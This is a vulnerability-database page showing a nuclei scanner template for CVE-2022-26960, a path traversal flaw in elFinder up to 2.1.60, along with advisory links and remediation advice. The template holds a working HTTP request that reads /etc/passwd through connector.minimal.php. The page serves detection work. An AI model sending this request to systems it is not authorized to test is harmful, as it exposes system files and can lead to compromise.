Lucene search
K

elFinder <=2.1.60 - Local File Inclusion

šŸ—“ļøĀ 05 Jul 2026Ā 03:01:21Reported byĀ ProjectDiscoveryTypeĀ 
nuclei
Ā nuclei
šŸ”—Ā github.comšŸ‘Ā 32Ā Views

elFinder <=2.1.60 - LFI via connector.minimal.php, unauthenticated access, unauthorized access, RC

Related
Refs
Code
ReporterTitlePublishedViews
Family
ATTACKERKB
CVE-2022-26960
21 Mar 202217:15
–attackerkb
Circl
CVE-2022-26960
21 Mar 202219:26
–circl
CNNVD
elFinder č·Æå¾„éåŽ†ę¼ę“ž
21 Mar 202200:00
–cnnvd
Check Point Advisories
Studio42 elFinder Directory Traversal (CVE-2022-26960)
21 Nov 202200:00
–checkpoint_advisories
CVE
CVE-2022-26960
21 Mar 202216:52
–cve
Cvelist
CVE-2022-26960
21 Mar 202216:52
–cvelist
Github Security Blog
Path Traversal in Studio-42 elFinder through 2.1.60
22 Mar 202200:00
–github
NVD
CVE-2022-26960
21 Mar 202217:15
–nvd
OpenVAS
elFinder < 2.1.61 Multiple Vulnerabilities - Version Check
25 Mar 202200:00
–openvas
OpenVAS
elFinder < 2.1.61 Directory Traversal Vulnerability - Active Check
5 Jul 202200:00
–openvas
Rows per page
id: CVE-2022-26960

info:
  name: elFinder <=2.1.60 - Local File Inclusion
  author: pikpikcu
  severity: critical
  description: |
    elFinder through 2.1.60 is affected by local file inclusion via connector.minimal.php. This allows unauthenticated remote attackers to read, write, and browse files outside the configured document root. This is due to improper handling of absolute file paths.
  impact: |
    Successful exploitation of this vulnerability can lead to unauthorized access to sensitive files, remote code execution, and potential compromise of the entire system.
  remediation: |
    Upgrade elFinder to version 2.1.61 or later to mitigate this vulnerability.
  reference:
    - https://www.synacktiv.com/publications/elfinder-the-story-of-a-repwning.html
    - https://github.com/Studio-42/elFinder/commit/3b758495538a448ac8830ee3559e7fb2c260c6db
    - https://www.synacktiv.com/publications.html
    - https://nvd.nist.gov/vuln/detail/CVE-2022-26960
    - https://github.com/ARPSyndicate/kenzer-templates
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N
    cvss-score: 9.1
    cve-id: CVE-2022-26960
    cwe-id: CWE-22
    epss-score: 0.50993
    epss-percentile: 0.98797
    cpe: cpe:2.3:a:std42:elfinder:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: std42
    product: elfinder
  tags: cve2022,cve,lfi,elfinder,std42,vuln

http:
  - raw:
      - |
        GET /elfinder/php/connector.minimal.php?cmd=file&target=l1_<@base64>/var/www/html/elfinder/files//..//..//..//..//..//../etc/passwd<@/base64>&download=1 HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

    matchers-condition: and
    matchers:
      - type: regex
        regex:
          - "root:.*:0:0:"

      - type: status
        status:
          - 200
# digest: 4a0a00473045022100e5a252c651609387870331eb9aa042871fabb900865464a55ecafc0a152931f002204bbd362d6ff2272ceca33d0d78b464d2bbd437a87da7129b73d2e3dca6b7c4f0:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation withĀ Vulners data

WeĀ provide theĀ essential building blocks forĀ cybersecurity solutions withĀ comprehensive, structured, andĀ constantly updated vulnerability andĀ exploits data

Api

Power your application withĀ Vulners API

The Vulners REST API offers reliable, high-performance access toĀ vulnerabilityĀ intelligence, withĀ 99.9%Ā SLAĀ uptime andĀ CDN-backed data delivery forĀ seamlessĀ global access

App

Assess and manage vulnerabilities withĀ VulnersĀ tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

04 Feb 2026 07:00Current
7.2High risk
Vulners AI Score7.2
CVSS 25.8
CVSS 3.19.1
EPSS0.50993
32